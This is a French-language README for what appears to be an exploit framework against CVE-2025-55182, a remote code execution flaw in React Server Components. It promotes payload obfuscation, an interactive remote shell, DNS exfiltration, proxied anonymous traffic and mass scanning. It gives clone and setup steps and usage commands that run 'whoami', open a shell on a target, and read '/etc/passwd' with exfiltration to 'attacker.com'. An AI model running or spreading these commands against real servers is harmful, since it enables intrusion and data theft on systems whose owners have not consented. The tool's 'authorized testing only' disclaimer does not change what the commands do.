
Scanner RCE avancé pour React Server Components ciblant CVE-2025-55182. Fonctionnalités : fingerprinting multi-étapes, vérification de vulnérabilité, exfiltration DNS, shell interactif, obfuscation de payload et reporting professionnel (JSON/HTML/PDF). Tests autorisés uniquement.
**Cet outil est conçu exclusivement à des fins ÉDUCATIVES et de TESTS DE SÉCURITÉ AUTORISÉS.**L'utilisation non autorisée de ce logiciel contre des cibles sans consentement écrit préalable constitue une violation des lois internationales sur la cybercriminalité, notamment le Computer Fraud and Abuse Act (CFAA), les exigences du RGPD et les conditions d'utilisation standard. L'auteur et les contributeurs déclinent toute responsabilité pour tout usage abusif, opération illégale ou dommage consécutif résultant de ce programme.Utilisez ce programme strictement à vos propres risques.
ReactRCE-Scanner est un framework d'évaluation et de vérification de sécurité de niveau entreprise, conçu spécifiquement pour CVE-2025-55182 [1], une vulnérabilité critique d'exécution de code à distance (RCE) affectant les React Server Components dans les versions 19.0.0 à 19.2.0.
Le framework comble le fossé entre la recherche théorique sur les vulnérabilités et la validation pratique de la sécurité. En intégrant l'empreinte multi-étapes, une réduction rigoureuse des faux positifs, une obfuscation avancée des payloads et une génération automatisée de rapports multi-formats, il offre aux ingénieurs en sécurité des capacités de diagnostic précises.
| Utilisation | Résultats de scan |
|---|---|
| Catégorie de fonctionnalité | Point fort de l'implémentation | Statut opérationnel |
|---|---|---|
| Empreinte intelligente | Détection multi-sources du framework et de la version avec algorithmes de scoring de confiance. | ✅ |
| Vérification multi-étapes | Pipeline de validation en 5 étapes conçu pour éliminer systématiquement les faux positifs. | ✅ |
| Génération de payloads | Générateur de payloads obfusqués prenant en charge l'exfiltration DNS et le multi-encodage. | ✅ |
| Shell interactif | Exécution de commandes pseudo-interactive en temps réel et accès shell sur les cibles vérifiées. | ✅ |
| Rapports complets | Génération automatisée de rapports aux formats JSON, HTML, PDF et Markdown. | ✅ |
| Exfiltration DNS | Exfiltration hors bande de la sortie des commandes via une gestion sécurisée des requêtes DNS. | ✅ |
| Moteur de concurrence | Architecture de scan multi-thread haute performance pour les grandes surfaces d'attaque. | ✅ |
| Intégration de proxy | Prise en charge des proxys HTTP/HTTPS et SOCKS pour un trafic d'évaluation anonymisé. | ✅ |
Clonez le dépôt et initialisez l'environnement à l'aide du script de configuration automatisé ou d'une installation manuelle des dépendances :
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh
# Alternatively, install core Python dependencies manually
pip install -r requirements.txt
Le framework fonctionne via une architecture CLI modulaire prenant en charge la validation d'une cible unique, le scan en masse à partir de listes de fichiers, le lancement de shells interactifs et la génération de rapports de conformité.
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan
# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json
# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"
# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell
# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com
# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf
Le framework effectue une reconnaissance approfondie avant la livraison du payload. Il analyse plusieurs champs d'en-tête HTTP (X-Powered-By, Next-Action, RSC ), les balises méta structurelles HTML (data-reactroot, __NEXT_DATA__), les ressources de build statiques et les bundles source JavaScript [2] [3].
Les scores de confiance sont classés en quatre niveaux :
CRITIQUE (95 %+) : Plusieurs indicateurs orthogonaux confirment des versions vulnérables du runtime React Server Component.
ÉLEVÉ (75–95 %) : Indicateurs structurels forts identifiés avec correspondance exacte de version.
MOYEN (50–75 %) : Marqueurs partiels du framework présents ; vérification manuelle requise.
FAIBLE (<50 %) : Heuristiques faibles détectées ; probabilité élevée de faux positif.